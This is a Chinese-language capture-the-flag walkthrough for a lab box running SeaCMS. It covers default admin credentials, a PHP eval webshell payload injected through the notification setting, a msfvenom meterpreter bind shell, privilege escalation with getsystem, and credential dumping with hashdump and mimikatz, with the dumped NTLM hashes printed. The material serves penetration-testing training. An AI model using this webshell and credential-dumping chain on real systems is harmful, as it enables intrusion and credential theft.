CyberStrikeLab PT
PT-1
入口:10.0.0.68
信息搜集
进去之后发现有一个海洋cms,访问/data/admin/ver.txt 得到版本号 版本号是v12.9 但是要登录后台,没想到后台是在/cslab目录,用户名和密码是cslab/cslab 登录进去之后找到会员消息通知那一栏,可以传入一句话木马
flag1
1";@eval($_POST[cmd]);;//
传入木马之后连接路径为http://10.0.0.68/data/admin/notify.php,蚁剑连接之后再根目录拿到flag1
go-flag{a3aecfd5-17db-52a0-ac1d-3a32124b04f4}
flag2
administrator用户的ntmlhash值
命令执行发现是windows的机器,使用msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe 生成一个正向连接的木马shell.exe,接着使用msf去连接,连接好之后就是提权抓hash的操作
┌──(root㉿kali-plus)-[~]
└─# msfconsole
Metasploit tip: Set the current module's RHOSTS with database values using
hosts -R or services -R
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.4.45-dev ]
+ -- --=[ 2490 exploits - 1281 auxiliary - 431 post ]
+ -- --=[ 1466 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 10.0.0.68
rhost => 10.0.0.68
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.0.0.68:4444
shell
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf6 exploit(multi/handler) > show options
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 10.0.0.68 no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.0.0.68:4444
[*] Sending stage (203846 bytes) to 10.0.0.68
[*] Meterpreter session 1 opened (172.16.233.2:45539 -> 10.0.0.68:4444) at 2025-04-25 21:08:27 +0800
meterpreter > shell
^C[-] shell: Interrupted
meterpreter > ls
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
meterpreter > getsystem
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cad8ef0c410c9709cea512052756ce5a:::
ApacheUser:1000:aad3b435b51404eeaad3b435b51404ee:01ef84bcd8079831f0966ac49ae9c0e6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
Administrator WIN-S4KAS0ERCGQ cad8ef0c410c9709cea512052756ce5a 947e1029f3fc1ce2f1f6592a1e55844dd3152ea2
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator WIN-S4KAS0ERCGQ (null)
WIN-S4KAS0ERCGQ$ WORKGROUP (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator WIN-S4KAS0ERCGQ (null)
win-s4kas0ercgq$ WORKGROUP (null)
最后拿到cad8ef0c410c9709cea512052756ce5a
浙公网安备 33010602011771号